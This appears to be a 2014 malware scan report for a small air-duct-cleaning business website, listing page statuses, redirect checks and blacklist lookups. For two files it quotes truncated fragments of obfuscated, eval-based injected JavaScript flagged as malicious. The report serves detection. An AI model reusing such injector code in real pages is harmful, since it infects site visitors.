Scanned pages/files
Request | Server response | Status |
http://jjairductcleaningalpharetta.com/ | 200 OK Content-Length: 12992 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" language="javascript"></script> | ||
http://jjairductcleaningalpharetta.com/script/jquery.js | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://jjairductcleaningalpharetta.com/script/ui_core.js | 200 OK Content-Length: 12011 Content-Type: application/javascript | clean |
http://jjairductcleaningalpharetta.com/script/ui_tabs.js | 200 OK Content-Length: 16572 Content-Type: application/javascript | clean |
http://jjairductcleaningalpharetta.com/script/lightbox.js | 200 OK Content-Length: 19604 Content-Type: application/javascript | clean |
http://jjairductcleaningalpharetta.com/index.html | 200 OK Content-Length: 12992 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" language="javascript"></script> | ||
http://jjairductcleaningalpharetta.com/aboutus.html | 200 OK Content-Length: 12152 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" language="javascript"></script> | ||
http://jjairductcleaningalpharetta.com/services.html | 200 OK Content-Length: 17371 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lnh="y";jote="document";try{+function(){if(document.querySelector)--(window[jote].getElementById("asd"))}()}catch(tunjcl){rll=function(cuf){cuf="fro"+cuf;for(airzoc=0;airzoc<lnh.length;airzoc++){rcov+=String[cuf](lqhb(vcbz+(lnh[airzoc]))-(79));}};};lqhb=eval;vcbz="0x";snoy=0;if(!snoy){try{++lqhb(jote).body}catch(tunjcl){yfr="(";}lnh="6f(b5(c4(bd(b2(c3(b8(be(bd(6f(b1(b8(b8(b4(7f(88(77(78(6f(ca(5c(59(6f(c5(b0(c1(6f(c2(c3(b0(c3(b8(b2(8c(76(b0(b9(b0(c7(76(8a(5c( ...[4153 bytes skipped]... Antivirus reports:
| ||
http://jjairductcleaningalpharetta.com/alpharetta-airductcleaning.html | 200 OK Content-Length: 15720 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" language="javascript"></script> | ||
http://jjairductcleaningalpharetta.com/alpharetta-dryerventcleaning.html | 200 OK Content-Length: 13915 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" language="javascript"></script> | ||
http://jjairductcleaningalpharetta.com/alpharetta-chimneysweep.html | 200 OK Content-Length: 12194 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" language="javascript"></script> | ||
http://jjairductcleaningalpharetta.com/alpharetta-coupons.html | 200 OK Content-Length: 13449 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" language="javascript"></script> | ||
http://jjairductcleaningalpharetta.com/contactus.html | 200 OK Content-Length: 13580 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" language="javascript"></script> | ||
http://jjairductcleaningalpharetta.com/script/jquery-1.2.6.min.js | 200 OK Content-Length: 55774 Content-Type: application/javascript | clean |
http://jjairductcleaningalpharetta.com/script/formfunc.js | 200 OK Content-Length: 9869 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) lnh="y";jote="document";try{+function(){if(document.querySelector)--(window[jote].getElementById("asd"))}()}catch(tunjcl){rll=function(cuf){cuf="fro"+cuf;for(airzoc=0;airzoc<lnh.length;airzoc++){rcov+=String[cuf](lqhb(vcbz+(lnh[airzoc]))-(79));}};};lqhb=eval;vcbz="0x";snoy=0;if(!snoy){try{++lqhb(jote).body}catch(tunjcl){yfr="(";}lnh="6f(b5(c4(bd(b2(c3(b8(be(bd(6f(b1(b8(b8(b4(7f(88(77(78(6f(ca(5c(59(6f(c5(b0(c1(6f(c2(c3(b0(c3(b8(b2(8c(76(b0(b9(b0(c7(76(8a(5c(59(6f(c5(b0(c1(6f(b2(be(bd(c3(c1(be Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jjairductcleaningalpharetta.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Jul 2014 19:01:09 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 12992
Content-Type: text/html
...12992 bytes of data.
GET / HTTP/1.1
Host: jjairductcleaningalpharetta.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Jul 2014 19:01:09 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 12992
Content-Type: text/html
...12992 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jjairductcleaningalpharetta.com
Referer: http://www.google.com/search?q=jjairductcleaningalpharetta.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jjairductcleaningalpharetta.com
Referer: http://www.google.com/search?q=jjairductcleaningalpharetta.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jjairductcleaningalpharetta.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jjairductcleaningalpharetta.com/
Result: jjairductcleaningalpharetta.com is not infected or malware details are not published yet.
Result: jjairductcleaningalpharetta.com is not infected or malware details are not published yet.